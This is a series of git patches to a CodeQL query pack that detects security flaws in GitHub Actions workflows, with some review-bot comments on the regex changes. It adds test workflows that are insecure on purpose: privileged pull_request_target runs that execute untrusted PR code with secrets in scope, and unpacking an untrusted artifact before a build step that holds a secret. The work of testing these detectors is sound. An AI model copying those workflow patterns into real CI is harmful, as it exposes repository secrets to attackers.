+++ b/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected 
@@ -360,7 +360,6 @@ nodes | .github/workflows/level0.yml:44:20:44:49 | github.event.issue.body | semmle.label | github.event.issue.body | | .github/workflows/level0.yml:69:35:69:66 | github.event.comment.body | semmle.label | github.event.comment.body | | .github/workflows/level1.yml:37:38:37:81 | github.event.workflow_run.head_branch | semmle.label | github.event.workflow_run.head_branch | -| .github/workflows/priv_pull_request.yml:14:21:14:57 | github.event.pull_request.body | semmle.label | github.event.pull_request.body | | .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | | .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | semmle.label | github.event.pull_request.body | | .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | semmle.label | github.event.pull_request.head.label | diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected b/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected index 6afef323ff01..4a561f26cb21 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected 
@@ -360,7 +360,6 @@ nodes | .github/workflows/level0.yml:44:20:44:49 | github.event.issue.body | semmle.label | github.event.issue.body | | .github/workflows/level0.yml:69:35:69:66 | github.event.comment.body | semmle.label | github.event.comment.body | | .github/workflows/level1.yml:37:38:37:81 | github.event.workflow_run.head_branch | semmle.label | github.event.workflow_run.head_branch | -| .github/workflows/priv_pull_request.yml:14:21:14:57 | github.event.pull_request.body | semmle.label | github.event.pull_request.body | | .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | | .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | semmle.label | github.event.pull_request.body | | .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | semmle.label | github.event.pull_request.head.label | 
@@ -628,7 +627,6 @@ subpaths | .github/workflows/inter-job1.yml:43:20:43:53 | needs.job1.outputs.job_output | .github/workflows/inter-job1.yml:22:9:26:6 | Uses Step: source | .github/workflows/inter-job1.yml:43:20:43:53 | needs.job1.outputs.job_output | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/inter-job1.yml:43:20:43:53 | needs.job1.outputs.job_output | ${{needs.job1.outputs.job_output}} | | .github/workflows/inter-job2.yml:45:20:45:53 | needs.job1.outputs.job_output | .github/workflows/inter-job2.yml:22:9:26:6 | Uses Step: source | .github/workflows/inter-job2.yml:45:20:45:53 | needs.job1.outputs.job_output | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/inter-job2.yml:45:20:45:53 | needs.job1.outputs.job_output | ${{needs.job1.outputs.job_output}} | | .github/workflows/inter-job4.yml:44:20:44:53 | needs.job1.outputs.job_output | .github/workflows/inter-job4.yml:22:9:26:6 | Uses Step: source | .github/workflows/inter-job4.yml:44:20:44:53 | needs.job1.outputs.job_output | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/inter-job4.yml:44:20:44:53 | needs.job1.outputs.job_output | ${{needs.job1.outputs.job_output}} | -| .github/workflows/priv_pull_request.yml:14:21:14:57 | github.event.pull_request.body | .github/workflows/priv_pull_request.yml:14:21:14:57 | github.event.pull_request.body | .github/workflows/priv_pull_request.yml:14:21:14:57 | github.event.pull_request.body | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/priv_pull_request.yml:14:21:14:57 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | | .github/workflows/push.yml:7:19:7:57 | github.event.commits[11].message | .github/workflows/push.yml:7:19:7:57 | github.event.commits[11].message | .github/workflows/push.yml:7:19:7:57 | github.event.commits[11].message | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:7:19:7:57 | github.event.commits[11].message | ${{ github.event.commits[11].message }} | | .github/workflows/push.yml:8:19:8:62 | github.event.commits[11].author.email | .github/workflows/push.yml:8:19:8:62 | github.event.commits[11].author.email | .github/workflows/push.yml:8:19:8:62 | github.event.commits[11].author.email | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:8:19:8:62 | github.event.commits[11].author.email | ${{ github.event.commits[11].author.email }} | | .github/workflows/push.yml:9:19:9:61 | github.event.commits[11].author.name | .github/workflows/push.yml:9:19:9:61 | github.event.commits[11].author.name | .github/workflows/push.yml:9:19:9:61 | github.event.commits[11].author.name | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:9:19:9:61 | github.event.commits[11].author.name | ${{ github.event.commits[11].author.name }} | From 9a0795cc754de717b10dc7e5e2df4a6472d728ce Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 23 Oct 2024 12:16:32 +0200 Subject: [PATCH 619/707] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 608e186ffcd1..1af220ff8fb7 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml 
@@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: github/actions-all -version: 0.1.74 +version: 0.1.75 dependencies: codeql/util: ^1.0.1 codeql/yaml: ^1.0.1 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index cdd396f985c6..e8098e4f2156 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: github/actions-queries -version: 0.1.74 +version: 0.1.75 groups: [actions, queries] suites: codeql-suites extractor: javascript From 674afc5eddb9202def8860e2bd474541c960b6a2 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 23 Oct 2024 15:48:42 +0200 Subject: [PATCH 620/707] Improve labelgate accuracy --- .../codeql/actions/security/ControlChecks.qll | 16 ++++++----- ...eckout.yml => label_trusted_checkout1.yml} | 0 .../workflows/label_trusted_checkout2.yml | 28 +++++++++++++++++++ .../CWE-829/UnpinnedActionsTag.expected | 6 ++-- .../UntrustedCheckoutCritical.expected | 13 ++++++--- 5 files changed, 50 insertions(+), 13 deletions(-) rename ql/test/query-tests/Security/CWE-829/.github/workflows/{label_trusted_checkout.yml => label_trusted_checkout1.yml} (100%) create mode 100644 ql/test/query-tests/Security/CWE-829/.github/workflows/label_trusted_checkout2.yml diff --git a/ql/lib/codeql/actions/security/ControlChecks.qll b/ql/lib/codeql/actions/security/ControlChecks.qll index 9b50a14bca2c..c73b06ae5302 100644 --- a/ql/lib/codeql/actions/security/ControlChecks.qll +++ b/ql/lib/codeql/actions/security/ControlChecks.qll 
@@ -159,14 +159,16 @@ abstract class CommentVsHeadDateCheck extends ControlCheck { /* Specific implementations of control checks */ class LabelIfCheck extends LabelCheck instanceof If { + string condition; + LabelIfCheck() { - // eg: contains(github.event.pull_request.labels.*.name, 'safe to test') - // eg: github.event.label.name == 'safe to test' - exists( - normalizeExpr(this.getCondition()) - .regexpFind([ - "\\bgithub\\.event\\.pull_request\\.labels\\b", "\\bgithub\\.event\\.label\\.name\\b" - ], _, _) + condition = normalizeExpr(this.getCondition()) and + ( + // eg: contains(github.event.pull_request.labels.*.name, 'safe to test') + condition.regexpMatch("(^|[^!])contains\\(\\s*github\\.event\\.pull_request\\.labels\\b.*") + or + // eg: github.event.label.name == 'safe to test' + condition.regexpMatch(".*\\bgithub\\.event\\.label\\.name\\s*==.*") ) } } diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/label_trusted_checkout.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/label_trusted_checkout1.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-829/.github/workflows/label_trusted_checkout.yml rename to ql/test/query-tests/Security/CWE-829/.github/workflows/label_trusted_checkout1.yml diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/label_trusted_checkout2.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/label_trusted_checkout2.yml new file mode 100644 index 000000000000..6014d08ed806 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/label_trusted_checkout2.yml 
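Review bot: The first pattern in the new `LabelIfCheck` body is anchored at the start of the condition, so a label gate combined with any other check — `github.event_name == 'pull_request_target' && contains(github.event.pull_request.labels.*.name, 'safe to test')` — is no longer recognised: `regexpMatch` must match the whole normalised string and `(^|[^!])contains\(` allows at most one character before `contains(`. The previous `regexpFind` accepted the check anywhere, and the commit appears to intend only to exclude the negated `!contains(...)` form (the new `label_trusted_checkout2.yml` fixture). `"(.*[^!])?contains\\(\\s*github\\.event\\.pull_request\\.labels\\b.*"` keeps that exclusion (the character before `contains(` still cannot be `!`) while matching compound conditions. Missing a gate errs on the safe side, the workflow is still reported, but it is exactly the false-positive direction this commit says it is improving. What `normalizeExpr` does to whitespace and `${{ }}` wrappers is not visible here, so the final pattern should be checked against it.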
@@ -0,0 +1,28 @@ +on: + pull_request_target: + types: [labeled] + +jobs: + build: + name: Build and test + runs-on: ubuntu-latest + if: | + !contains(github.event.pull_request.labels.*.name, 'safe to test') + steps: + - uses: actions/checkout@v2 + with: + ref: ${{ github.event.pull_request.head.sha }} + + - uses: actions/setup-node@v1 + - run: | + npm install + npm build + + - uses: completely/fakeaction@v2 + with: + arg1: ${{ secrets.supersecret }} + + - uses: fakerepo/comment-on-pr@v1 + with: + message: | + Thank you! diff --git a/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected b/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected index 58a000efac4f..0457fd7afaac 100644 --- a/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected +++ b/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected 
@@ -13,8 +13,10 @@ | .github/workflows/issue_comment_octokit.yml:13:15:13:41 | octokit/request-action@v2.x | Unpinned 3rd party Action 'Octokit (heuristics)' step $@ uses 'octokit/request-action' with ref 'v2.x', not a pinned commit hash | .github/workflows/issue_comment_octokit.yml:12:9:19:6 | Uses Step: fetch_issue | Uses Step: fetch_issue | | .github/workflows/issue_comment_octokit.yml:20:15:20:41 | octokit/request-action@v2.x | Unpinned 3rd party Action 'Octokit (heuristics)' step $@ uses 'octokit/request-action' with ref 'v2.x', not a pinned commit hash | .github/workflows/issue_comment_octokit.yml:19:9:26:6 | Uses Step: fetch_pr | Uses Step: fetch_pr | | .github/workflows/issue_comment_octokit.yml:104:15:104:43 | octokit/request-action@v2.0.2 | Unpinned 3rd party Action 'Octokit (heuristics)' step $@ uses 'octokit/request-action' with ref 'v2.0.2', not a pinned commit hash | .github/workflows/issue_comment_octokit.yml:103:9:109:6 | Uses Step: request | Uses Step: request | -| .github/workflows/label_trusted_checkout.yml:20:13:20:36 | completely/fakeaction@v2 | Unpinned 3rd party Action 'label_trusted_checkout.yml' step $@ uses 'completely/fakeaction' with ref 'v2', not a pinned commit hash | .github/workflows/label_trusted_checkout.yml:20:7:24:4 | Uses Step | Uses Step | -| .github/workflows/label_trusted_checkout.yml:24:13:24:37 | fakerepo/comment-on-pr@v1 | Unpinned 3rd party Action 'label_trusted_checkout.yml' step $@ uses 'fakerepo/comment-on-pr' with ref 'v1', not a pinned commit hash | .github/workflows/label_trusted_checkout.yml:24:7:27:21 | Uses Step | Uses Step | +| .github/workflows/label_trusted_checkout1.yml:20:13:20:36 | completely/fakeaction@v2 | Unpinned 3rd party Action 'label_trusted_checkout1.yml' step $@ uses 'completely/fakeaction' with ref 'v2', not a pinned commit hash | .github/workflows/label_trusted_checkout1.yml:20:7:24:4 | Uses Step | Uses Step | +| .github/workflows/label_trusted_checkout1.yml:24:13:24:37 | 
fakerepo/comment-on-pr@v1 | Unpinned 3rd party Action 'label_trusted_checkout1.yml' step $@ uses 'fakerepo/comment-on-pr' with ref 'v1', not a pinned commit hash | .github/workflows/label_trusted_checkout1.yml:24:7:27:21 | Uses Step | Uses Step | +| .github/workflows/label_trusted_checkout2.yml:21:13:21:36 | completely/fakeaction@v2 | Unpinned 3rd party Action 'label_trusted_checkout2.yml' step $@ uses 'completely/fakeaction' with ref 'v2', not a pinned commit hash | .github/workflows/label_trusted_checkout2.yml:21:7:25:4 | Uses Step | Uses Step | +| .github/workflows/label_trusted_checkout2.yml:25:13:25:37 | fakerepo/comment-on-pr@v1 | Unpinned 3rd party Action 'label_trusted_checkout2.yml' step $@ uses 'fakerepo/comment-on-pr' with ref 'v1', not a pinned commit hash | .github/workflows/label_trusted_checkout2.yml:25:7:28:21 | Uses Step | Uses Step | | .github/workflows/level0.yml:36:15:36:47 | rlespinasse/github-slug-action@v4 | Unpinned 3rd party Action 'Poutine Level 0' step $@ uses 'rlespinasse/github-slug-action' with ref 'v4', not a pinned commit hash | .github/workflows/level0.yml:36:9:39:6 | Uses Step | Uses Step | | .github/workflows/mend.yml:31:15:31:34 | ruby/setup-ruby@v1 | Unpinned 3rd party Action 'Test' step $@ uses 'ruby/setup-ruby' with ref 'v1', not a pinned commit hash | .github/workflows/mend.yml:29:9:33:28 | Uses Step | Uses Step | | .github/workflows/pr-workflow.yml:60:15:60:52 | amannn/action-semantic-pull-request@v5 | Unpinned 3rd party Action 'pr-workflow' step $@ uses 'amannn/action-semantic-pull-request' with ref 'v5', not a pinned commit hash | .github/workflows/pr-workflow.yml:60:9:70:6 | Uses Step | Uses Step | diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected index 1ed39f73a485..6b2735181674 100644 --- a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected 
+++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected 
@@ -101,10 +101,14 @@ edges | .github/workflows/issue_comment_octokit.yml:66:9:79:6 | Uses Step: sha | .github/workflows/issue_comment_octokit.yml:79:9:83:2 | Uses Step | | .github/workflows/issue_comment_octokit.yml:87:9:95:6 | Uses Step: sha | .github/workflows/issue_comment_octokit.yml:95:9:100:2 | Uses Step | | .github/workflows/issue_comment_octokit.yml:103:9:109:6 | Uses Step: request | .github/workflows/issue_comment_octokit.yml:109:9:114:66 | Uses Step | -| .github/workflows/label_trusted_checkout.yml:11:7:15:4 | Uses Step | .github/workflows/label_trusted_checkout.yml:15:7:16:4 | Uses Step | -| .github/workflows/label_trusted_checkout.yml:15:7:16:4 | Uses Step | .github/workflows/label_trusted_checkout.yml:16:7:20:4 | Run Step | -| .github/workflows/label_trusted_checkout.yml:16:7:20:4 | Run Step | .github/workflows/label_trusted_checkout.yml:20:7:24:4 | Uses Step | -| .github/workflows/label_trusted_checkout.yml:20:7:24:4 | Uses Step | .github/workflows/label_trusted_checkout.yml:24:7:27:21 | Uses Step | +| .github/workflows/label_trusted_checkout1.yml:11:7:15:4 | Uses Step | .github/workflows/label_trusted_checkout1.yml:15:7:16:4 | Uses Step | +| .github/workflows/label_trusted_checkout1.yml:15:7:16:4 | Uses Step | .github/workflows/label_trusted_checkout1.yml:16:7:20:4 | Run Step | +| .github/workflows/label_trusted_checkout1.yml:16:7:20:4 | Run Step | .github/workflows/label_trusted_checkout1.yml:20:7:24:4 | Uses Step | +| .github/workflows/label_trusted_checkout1.yml:20:7:24:4 | Uses Step | .github/workflows/label_trusted_checkout1.yml:24:7:27:21 | Uses Step | +| .github/workflows/label_trusted_checkout2.yml:12:7:16:4 | Uses Step | .github/workflows/label_trusted_checkout2.yml:16:7:17:4 | Uses Step | +| .github/workflows/label_trusted_checkout2.yml:16:7:17:4 | Uses Step | .github/workflows/label_trusted_checkout2.yml:17:7:21:4 | Run Step | +| .github/workflows/label_trusted_checkout2.yml:17:7:21:4 | Run Step | 
.github/workflows/label_trusted_checkout2.yml:21:7:25:4 | Uses Step | +| .github/workflows/label_trusted_checkout2.yml:21:7:25:4 | Uses Step | .github/workflows/label_trusted_checkout2.yml:25:7:28:21 | Uses Step | | .github/workflows/level0.yml:33:9:36:6 | Uses Step | .github/workflows/level0.yml:36:9:39:6 | Uses Step | | .github/workflows/level0.yml:36:9:39:6 | Uses Step | .github/workflows/level0.yml:39:9:52:2 | Run Step: check_profanities | | .github/workflows/level0.yml:62:9:65:6 | Uses Step | .github/workflows/level0.yml:65:9:86:2 | Uses Step | 
@@ -310,6 +314,7 @@ edges | .github/workflows/auto_ci.yml:84:9:93:6 | Run Step | .github/workflows/auto_ci.yml:67:9:74:6 | Uses Step | .github/workflows/auto_ci.yml:84:9:93:6 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/auto_ci.yml:6:3:6:21 | pull_request_target | .github/workflows/auto_ci.yml | | .github/workflows/dependabot3.yml:25:9:48:6 | Run Step: set-milestone | .github/workflows/dependabot3.yml:15:9:20:6 | Uses Step | .github/workflows/dependabot3.yml:25:9:48:6 | Run Step: set-milestone | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/dependabot3.yml:3:5:3:23 | pull_request_target | .github/workflows/dependabot3.yml | | .github/workflows/gitcheckout.yml:21:11:23:22 | Run Step | .github/workflows/gitcheckout.yml:10:11:18:8 | Run Step | .github/workflows/gitcheckout.yml:21:11:23:22 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/gitcheckout.yml:2:3:2:21 | pull_request_target | .github/workflows/gitcheckout.yml | +| .github/workflows/label_trusted_checkout2.yml:17:7:21:4 | Run Step | .github/workflows/label_trusted_checkout2.yml:12:7:16:4 | Uses Step | .github/workflows/label_trusted_checkout2.yml:17:7:21:4 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/label_trusted_checkout2.yml:2:3:2:21 | pull_request_target | .github/workflows/label_trusted_checkout2.yml | | .github/workflows/level0.yml:107:9:112:2 | Run Step | .github/workflows/level0.yml:99:9:103:6 | Uses Step | .github/workflows/level0.yml:107:9:112:2 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/level0.yml:3:3:3:8 | issues | .github/workflows/level0.yml | | .github/workflows/level0.yml:107:9:112:2 | Run Step | .github/workflows/level0.yml:99:9:103:6 | Uses Step | .github/workflows/level0.yml:107:9:112:2 | Run Step | Execution of untrusted code on a privileged workflow ($@) | 
.github/workflows/level0.yml:5:3:5:15 | issue_comment | .github/workflows/level0.yml | | .github/workflows/level0.yml:107:9:112:2 | Run Step | .github/workflows/level0.yml:99:9:103:6 | Uses Step | .github/workflows/level0.yml:107:9:112:2 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/level0.yml:7:3:7:21 | pull_request_target | .github/workflows/level0.yml | From ae6309daf6245078e328425a241ee34e7f9be250 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 23 Oct 2024 22:02:58 +0200 Subject: [PATCH 621/707] Account for tar -C option to specify path --- .../security/ArtifactPoisoningQuery.qll | 14 +++---- .../CWE-829/.github/workflows/test25.yml | 42 +++++++++++++++++++ .../ArtifactPoisoningCritical.expected | 4 ++ .../CWE-829/ArtifactPoisoningMedium.expected | 3 ++ .../UntrustedCheckoutCritical.expected | 3 ++ 5 files changed, 59 insertions(+), 7 deletions(-) create mode 100644 ql/test/query-tests/Security/CWE-829/.github/workflows/test25.yml diff --git a/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll b/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll index 48bca0e46f95..56f363164872 100644 --- a/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll +++ b/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll @@ -4,9 +4,9 @@ import codeql.actions.DataFlow import codeql.actions.dataflow.FlowSources import codeql.actions.security.PoisonableSteps -string unzipRegexp() { result = ".*(unzip|tar)\\s+.*" } +string unzipRegexp() { result = "(unzip|tar)\\s+.*" } -string unzipDirArgRegexp() { result = "-d\\s+([^ ]+).*" } +string unzipDirArgRegexp() { result = "(-d|-C)\\s+([^ ]+).*" } abstract class UntrustedArtifactDownloadStep extends Step { abstract string getPath(); 
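Review bot: `unzipDirArgRegexp()` only recognises the space-separated `-d DIR` / `-C DIR` forms, so `tar ... --directory=DIR`, `tar ... --directory DIR` and the combined short-flag form `tar -xzC DIR` produce no capture and fall through to the `GITHUB_WORKSPACE/` default used by the callers in the following hunks. That default over-approximates, so the miss is conservative, but the extraction path recorded for those commands is wrong. `"(-d|-C|--directory)[= ]\\s*([^ ]+).*"` covers the long-option spellings while keeping the group count at two, so the capture index `3` the callers now use stays valid. Dropping the leading `.*` from `unzipRegexp()` also means a command must begin with `unzip`/`tar`; whether `sudo tar ...` or `cd x && tar ...` still match depends on how `getACommand()` splits a script, which is outside this hunk.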
@@ -166,7 +166,7 @@ class ActionsGitHubScriptDownloadStep extends UntrustedArtifactDownloadStep, Use .(Run) .getScript() .getACommand() - .regexpCapture(unzipRegexp() + unzipDirArgRegexp(), 2))) + .regexpCapture(unzipRegexp() + unzipDirArgRegexp(), 3))) else if this.getAFollowingStep().(Run).getScript().getACommand().regexpMatch(unzipRegexp()) then result = "GITHUB_WORKSPACE/" @@ -197,13 +197,13 @@ class GHRunArtifactDownloadStep extends UntrustedArtifactDownloadStep, Run { result = normalizePath(trimQuotes(this.getScript() .getACommand() - .regexpCapture(unzipRegexp() + unzipDirArgRegexp(), 2))) or + .regexpCapture(unzipRegexp() + unzipDirArgRegexp(), 3))) or result = normalizePath(trimQuotes(this.getAFollowingStep() .(Run) .getScript() .getACommand() - .regexpCapture(unzipRegexp() + unzipDirArgRegexp(), 2))) + .regexpCapture(unzipRegexp() + unzipDirArgRegexp(), 3))) else if this.getAFollowingStep().(Run).getScript().getACommand().regexpMatch(unzipRegexp()) or @@ -243,13 +243,13 @@ class DirectArtifactDownloadStep extends UntrustedArtifactDownloadStep, Run { result = normalizePath(trimQuotes(this.getScript() .getACommand() - .regexpCapture(unzipRegexp() + unzipDirArgRegexp(), 2))) or + .regexpCapture(unzipRegexp() + unzipDirArgRegexp(), 3))) or result = normalizePath(trimQuotes(this.getAFollowingStep() .(Run) .getScript() .getACommand() - .regexpCapture(unzipRegexp() + unzipDirArgRegexp(), 2))) + .regexpCapture(unzipRegexp() + unzipDirArgRegexp(), 3))) else result = "GITHUB_WORKSPACE/" } } diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/test25.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/test25.yml new file mode 100644 index 000000000000..c825cc73813b --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/test25.yml 
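Review bot: The capture index `3` is now repeated in five places across `ActionsGitHubScriptDownloadStep`, `GHRunArtifactDownloadStep` and `DirectArtifactDownloadStep`, and its value silently depends on the number of groups in two separately defined regex strings, so the next tweak to `unzipRegexp()` or `unzipDirArgRegexp()` has to find and update every call site. Centralising the extraction in one helper next to the regex definitions gives the index a single home and a place to document it; each call site then reduces to `result = extractDirArg(this.getScript().getACommand())` or `result = extractDirArg(this.getAFollowingStep().(Run).getScript().getACommand())`. All three classes start and end outside these hunks.

```ql
/**
 * Gets the normalized target directory of an `unzip ... -d DIR` or
 * `tar ... -C DIR` command, or nothing if `cmd` is not such a command.
 * Group 3 is the directory: groups 1 and 2 are the tool and flag
 * alternatives in unzipRegexp() and unzipDirArgRegexp().
 */
bindingset[cmd]
string extractDirArg(string cmd) {
  result =
    normalizePath(trimQuotes(cmd.regexpCapture(unzipRegexp() + unzipDirArgRegexp(), 3)))
}

// … unchanged: class bodies; each normalizePath(trimQuotes(...regexpCapture(..., 3))) becomes extractDirArg(...) …
```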
@@ -0,0 +1,42 @@ +on: + workflow_run: + workflows: [ "build" ] + types: [ completed ] + +defaults: + run: + shell: bash + +jobs: + publish-build-scans: + name: Build scan publish + if: github.repository == 'test/test' && github.event.workflow_run.event == 'pull_request' && github.event.workflow_run.conclusion != 'cancelled' + runs-on: ubuntu-latest + steps: + # Checkout target branch which has trusted code + - name: Check out target branch + uses: actions/checkout@v4 + with: + persist-credentials: false + ref: ${{ github.ref }} + - name: Download build scan + id: downloadBuildScan + uses: actions/download-artifact@v4 + with: + name: build-scan + github-token: ${{ github.token }} + repository: ${{ github.repository }} + run-id: ${{ github.event.workflow_run.id }} + # Don't fail a build if the file doesn't exist + continue-on-error: true + - name: Extract previously uploaded build scan content + if: ${{ steps.downloadBuildScan.outcome != 'failure'}} + run: tar -xzf build-scan.tgz -C ~ + - name: Publish + if: ${{ steps.downloadBuildScan.outcome != 'failure'}} + # Don't fail a build if publishing fails + continue-on-error: true + run: | + ./gradlew buildScanPublishPrevious + env: + ACCESS_KEY: ${{ secrets.TEST_ACCESS_KEY }} diff --git a/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningCritical.expected b/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningCritical.expected index 53b14ee7b50e..fd3c1fbc195f 100644 --- a/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningCritical.expected +++ b/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningCritical.expected 
@@ -15,6 +15,7 @@ edges | .github/workflows/artifactpoisoning81.yml:28:9:31:6 | Uses Step | .github/workflows/artifactpoisoning81.yml:31:14:31:27 | python test.py | provenance | Config | | .github/workflows/artifactpoisoning101.yml:10:9:16:6 | Uses Step | .github/workflows/artifactpoisoning101.yml:17:14:19:59 | PR_NUMBER=$(./get_pull_request_number.sh pr_number.txt)\necho "PR_NUMBER=$PR_NUMBER" >> $GITHUB_OUTPUT \n | provenance | Config | | .github/workflows/test18.yml:12:15:33:12 | Uses Step | .github/workflows/test18.yml:36:15:40:58 | Uses Step | provenance | Config | +| .github/workflows/test25.yml:22:9:32:6 | Uses Step: downloadBuildScan | .github/workflows/test25.yml:39:14:40:45 | ./gradlew buildScanPublishPrevious\n | provenance | Config | nodes | .github/actions/download-artifact-2/action.yaml:6:7:25:4 | Uses Step | semmle.label | Uses Step | | .github/workflows/artifactpoisoning11.yml:13:9:32:6 | Uses Step | semmle.label | Uses Step | 
@@ -47,6 +48,8 @@ nodes | .github/workflows/artifactpoisoning101.yml:17:14:19:59 | PR_NUMBER=$(./get_pull_request_number.sh pr_number.txt)\necho "PR_NUMBER=$PR_NUMBER" >> $GITHUB_OUTPUT \n | semmle.label | PR_NUMBER=$(./get_pull_request_number.sh pr_number.txt)\necho "PR_NUMBER=$PR_NUMBER" >> $GITHUB_OUTPUT \n | | .github/workflows/test18.yml:12:15:33:12 | Uses Step | semmle.label | Uses Step | | .github/workflows/test18.yml:36:15:40:58 | Uses Step | semmle.label | Uses Step | +| .github/workflows/test25.yml:22:9:32:6 | Uses Step: downloadBuildScan | semmle.label | Uses Step: downloadBuildScan | +| .github/workflows/test25.yml:39:14:40:45 | ./gradlew buildScanPublishPrevious\n | semmle.label | ./gradlew buildScanPublishPrevious\n | subpaths #select | .github/workflows/artifactpoisoning11.yml:38:11:38:77 | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | .github/workflows/artifactpoisoning11.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning11.yml:38:11:38:77 | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | Potential artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning11.yml:38:11:38:77 | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | 
@@ -65,3 +68,4 @@ subpaths | .github/workflows/artifactpoisoning92.yml:29:14:29:26 | make snapshot | .github/actions/download-artifact-2/action.yaml:6:7:25:4 | Uses Step | .github/workflows/artifactpoisoning92.yml:29:14:29:26 | make snapshot | Potential artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning92.yml:29:14:29:26 | make snapshot | make snapshot | | .github/workflows/artifactpoisoning101.yml:17:14:19:59 | PR_NUMBER=$(./get_pull_request_number.sh pr_number.txt)\necho "PR_NUMBER=$PR_NUMBER" >> $GITHUB_OUTPUT \n | .github/workflows/artifactpoisoning101.yml:10:9:16:6 | Uses Step | .github/workflows/artifactpoisoning101.yml:17:14:19:59 | PR_NUMBER=$(./get_pull_request_number.sh pr_number.txt)\necho "PR_NUMBER=$PR_NUMBER" >> $GITHUB_OUTPUT \n | Potential artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning101.yml:17:14:19:59 | PR_NUMBER=$(./get_pull_request_number.sh pr_number.txt)\necho "PR_NUMBER=$PR_NUMBER" >> $GITHUB_OUTPUT \n | PR_NUMBER=$(./get_pull_request_number.sh pr_number.txt)\necho "PR_NUMBER=$PR_NUMBER" >> $GITHUB_OUTPUT \n | | .github/workflows/test18.yml:36:15:40:58 | Uses Step | .github/workflows/test18.yml:12:15:33:12 | Uses Step | .github/workflows/test18.yml:36:15:40:58 | Uses Step | Potential artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/test18.yml:36:15:40:58 | Uses Step | Uses Step | +| .github/workflows/test25.yml:39:14:40:45 | ./gradlew buildScanPublishPrevious\n | .github/workflows/test25.yml:22:9:32:6 | Uses Step: downloadBuildScan | .github/workflows/test25.yml:39:14:40:45 | ./gradlew buildScanPublishPrevious\n | Potential artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/test25.yml:39:14:40:45 | ./gradlew buildScanPublishPrevious\n | ./gradlew buildScanPublishPrevious\n | 
